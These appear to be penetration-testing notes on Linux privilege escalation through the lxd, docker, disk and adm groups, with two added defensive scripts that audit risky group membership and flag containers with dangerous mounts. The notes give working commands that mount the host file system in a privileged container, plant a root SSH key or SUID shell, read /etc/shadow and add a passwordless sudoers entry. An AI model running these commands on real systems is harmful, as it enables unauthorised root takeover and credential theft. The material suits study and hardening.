
Privileged Groups

LXC / LXD

  • LXD is Ubuntu's container manager, similar to Docker.
  • upon installation, all users are added to the lxd group
  • membership in this group can be used to escalate to root, because a member can start a privileged container with the host file system mounted inside it

Steps

  • check if the user is a part of this group
    • id -> look for lxd in the group list, e.g. 110(lxd)
  • unzip alpine.zip
  • lxd init
    • choose the default option for each prompt
    • help - https://www.digitalocean.com/community/tutorials/how-to-set-up-and-use-lxd-on-ubuntu-16-04
  • lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
    • import the local image (metadata tarball plus root file system)
  • lxc init alpine r00t -c security.privileged=true
    • create a privileged container: with security.privileged=true the container runs without UID mapping, so root inside the container is the same uid 0 as root on the host
  • lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
    • mount the host's root file system at /mnt/root inside the container
  • lxc start r00t
    • start the container
  • lxc exec r00t /bin/sh
    • spawn a shell inside the container; the host file system is under /mnt/root

Docker

  • if a user is a part of the docker group, they can start a new container with the host's /root directory mounted as a volume.
  • docker run -v /root:/mnt -it ubuntu
  • The same can be done for other directories such as /etc, which gives access to /etc/shadow for offline password cracking or lets the user add a privileged account.
  • retrieve ssh keys, creds, add other users
  • One-liner to exploit the docker group
    • docker run --rm -v /:/mnt -it alpine chroot /mnt /bin/bash
  • Add an SSH key to root's authorized_keys
    docker run -v /root:/mnt --rm -it alpine sh -c \
      "echo 'YOUR_SSH_KEY' >> /mnt/.ssh/authorized_keys"

  • Create SUID binary
    docker run -v /:/mnt --rm -it alpine sh -c \
      "cp /bin/sh /mnt/tmp/rootshell && chmod 4755 /mnt/tmp/rootshell"

    # On host:
    /tmp/rootshell -p  # -p preserves SUID

  • Direct root shell
    docker run -v /:/hostfs --rm -it ubuntu bash
    # Then: cat /hostfs/etc/shadow
    # Or: echo 'user ALL=(ALL) NOPASSWD:ALL' > /hostfs/etc/sudoers.d/pwn

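Every Docker technique above leaves the same footprint: a container whose bind mounts expose a sensitive host path (/, /root, /etc) or that runs privileged. The following is an added detection example, not part of these notes, that flags such containers. It assumes one line per container in the format produced by the (hypothetical) format string shown in the comment; the sample lines are constructed, not captured from a real host.

```shell
#!/bin/sh
# Added detection example (not part of the original notes): flag running
# containers that bind-mount sensitive host paths or run privileged.
# Input lines are assumed to come from this (hypothetical) format string,
# one container per line:
#   docker inspect --format \
#     '{{.Name}} privileged={{.HostConfig.Privileged}} binds={{.HostConfig.Binds}}' \
#     $(docker ps -q)

# Host paths whose exposure inside a container is treated as root-equivalent.
SENSITIVE_SOURCES="/ /root /etc /home /var/run/docker.sock"

# flag_host_mounts: reads inspect lines on stdin and prints one ALERT line per
# container that is privileged or binds a sensitive host path (or a child of it).
flag_host_mounts() {
    awk -v sens="$SENSITIVE_SOURCES" '
    BEGIN { n = split(sens, s, " ") }
    {
        name = $1; reason = ""
        if ($2 == "privileged=true") reason = reason " privileged"
        # binds=[src:dst[:opts] src:dst ...]  (Go prints a slice as [a b c])
        if (match($0, /binds=\[[^]]*\]/)) {
            list = substr($0, RSTART + 7, RLENGTH - 8)   # strip "binds=[" and "]"
            m = split(list, binds, " ")
            for (i = 1; i <= m; i++) {
                split(binds[i], parts, ":")
                src = parts[1]
                for (j = 1; j <= n; j++)
                    if (src == s[j] || index(src, s[j] "/") == 1)
                        reason = reason " host:" src
            }
        }
        if (reason != "") print "ALERT " name reason
    }'
}

# Constructed sample (not captured from a real host). The r00t line is what the
# "docker run -v /:/mnt" container from the notes above would look like.
sample_inspect_lines() {
    printf '%s\n' \
        '/r00t privileged=false binds=[/:/mnt]' \
        '/web privileged=false binds=[/srv/web/html:/usr/share/nginx/html:ro]' \
        '/dbg privileged=true binds=[]' \
        '/keys privileged=false binds=[/root/.ssh:/mnt/ssh:ro]'
}

# Run against the sample; replace sample_inspect_lines with the docker inspect
# command from the header comment to audit a live host.
sample_inspect_lines | flag_host_mounts
```

Only the web container passes: its bind source lives under /srv, which is not in SENSITIVE_SOURCES. A prefix match (index(src, s[j] "/") == 1) is deliberate so that a mount of /root/.ssh or /etc/ssh is caught, not just the directory itself.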

Disk

  • members of the disk group have direct access to the block devices in /dev, such as /dev/sda1
  • debugfs on such a device reads the entire file system with root-equivalent access, since file permissions are not enforced at the block-device level.
  • retrieve ssh keys, creds, add other users

ADM

  • adm group members can read the logs under /var/log
  • this is not root on its own, but it can be leveraged to gather sensitive data stored in log files or to enumerate user actions and running cron jobs.

  • grep -r "flag" .

  • aureport (audit log summary tool) - https://linux.die.net/man/8/aureport
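Each section above starts with the same question: who is in lxd, docker, disk or adm? `id` only answers it for the current user. The following is an added audit example, not part of these notes, that lists every member of those groups from an /etc/group-format file so an administrator can review them across all accounts. The sample group file it writes is constructed data, not from a real host.

```shell
#!/bin/sh
# Added audit example (not part of the original notes): list every member of
# the groups these notes treat as root-equivalent, from an /etc/group-format
# file. `id` only tells you about the current user; this covers all accounts.
# Caveat: a user whose primary GID (4th field of /etc/passwd) is one of these
# groups does not appear in /etc/group's member list and is not reported here.

RISKY_GROUPS="lxd docker disk adm"

# risky_group_members [GROUPFILE]: prints "group:user" for each member of a
# risky group. GROUPFILE defaults to /etc/group.
risky_group_members() {
    groupfile="${1:-/etc/group}"
    for g in $RISKY_GROUPS; do
        # /etc/group lines are name:password:gid:member1,member2,...
        awk -F: -v g="$g" '$1 == g && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print $1 ":" m[i]
        }' "$groupfile"
    done
}

# user_in_risky_group USER [GROUPFILE]: exit 0 if USER is a member of any
# risky group, 1 otherwise.
user_in_risky_group() {
    risky_group_members "${2:-/etc/group}" | grep -q ":$1\$"
}

# write_sample_group_file PATH: writes a constructed /etc/group-style file
# (sample data, not from a real host) so the audit can be demonstrated offline.
write_sample_group_file() {
    printf '%s\n' 'root:x:0:' 'lxd:x:110:alice,bob' 'docker:x:999:carol' \
        'disk:x:6:' 'adm:x:4:alice' 'users:x:100:dave' > "$1"
}

demo() {
    f=$(mktemp)
    write_sample_group_file "$f"
    echo "members of risky groups:"
    risky_group_members "$f"
    for u in alice dave; do
        if user_in_risky_group "$u" "$f"; then
            echo "$u: member of a root-equivalent group"
        else
            echo "$u: ok"
        fi
    done
    rm -f "$f"
}

demo
# Live audit of the current host: risky_group_members /etc/group
```

On the sample file the audit reports alice (lxd and adm), bob (lxd) and carol (docker); dave, who is only in users, is not flagged. Pair the output with the caveat in the header comment before concluding a host is clean.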